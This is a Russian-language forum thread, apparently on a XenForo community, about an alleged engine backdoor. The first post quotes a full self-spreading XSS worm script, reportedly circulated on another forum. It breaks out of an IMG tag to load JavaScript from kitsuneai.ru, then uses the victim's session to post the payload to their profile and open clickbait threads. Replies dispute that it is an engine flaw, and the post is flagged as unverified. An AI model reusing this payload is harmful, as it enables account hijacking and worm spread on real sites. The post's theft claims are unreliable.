Бэкдор, серьёзная уязвимость движка.

alexey_018

Участники
Сообщения
49
Решения
4
Реакции
-4
Баллы
13
Публикация непроверенной и недостоверной информации.
Добрый день! Буквально 5 минут назад на одном форуме распространили скрипт, который может взаимодействовать с движком и совершать действия с аккаунтов.

Так нейросеть "Kitsune Ai", довольно безобидным способом распростронила скрипт, который мог украсть данные пользователей (по данным пользователей форума, с паблик плагинов по типу Wallet списали деньги, )
1686310508759.png

Как выглядит скрипт:
JavaScript:
const zlom = '[IMG]https://lztcdn.com/.mp4?.="><script src="https://kitsuneai.ru/test5.js?126"></script>[/IMG]'
XenForo.ajax('https://zelenka.guru/members/'+XenForo.visitor.user_id+'/post', {
    message_html: '<p>лол я нашел секретный функционал АДМИНИСТРАЦИИ.. .ЭТО НОРМАЛЬНО??? —-> '+escapeHtml(zlom)+'[img]https://lztcdn.com/files/b24bca943500d71de13a8173365669eccdab893e06eb62e889da1dca078e2e4f.webp[/img]</p>'
})

// передаю привет матери курла
// а еще следующим людям: vuchaev2015, its_niks, Ivan, DaleCooper, zoto_ff, пользователь

// 17:00 09.06.2023 edit:

const forum = [899, 585][rand(2)];
const title = [
    'Это нормально ? ?',
    'что за фигня?',
    'что с форумом?',
    'у меня какая-то параша?',
    'помогите у меня какая-то фигня?'
][rand(5)];
XenForo.ajax('/forums/'+forum+'/add-thread', {
    title,
    message_html: '<p>вот такое у меня:</p><p>'+escapeHtml(zlom)+' [IMG]https://lztcdn.com/files/9942c87d3e58512b9c60f0eb3855cbe85b7014f031da29e1d5fa9093d53efe0e.webp[/IMG]</p><p> (если кто не видит кликните пж)</p>'
})

function escapeHtml(text) {
    return text
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#039;");
}

function rand (max) {
    return Math.floor(Math.random() * max);
}


Из-за этого скрипта начали создаваться темы,
chrome_Iwyibbg39Z.png
 
Последнее редактирование:
alexey_018, каким ху боком это относится к движку ?
У лолза уже давным давно всё переделано тысячу раз.

И то, что выше - не имеет никакого отношения к движку, от слова совсем.
 
Какое отношение "уязвимости Лолза", на котором вообще-то до сих пор первая ветка движка, относятся ко второй?
В двойке даже XenForo объекта в браузере нет, зато есть XF:
1686324255246.png
 
Современный облачный хостинг провайдер | Aéza
Назад
Сверху Снизу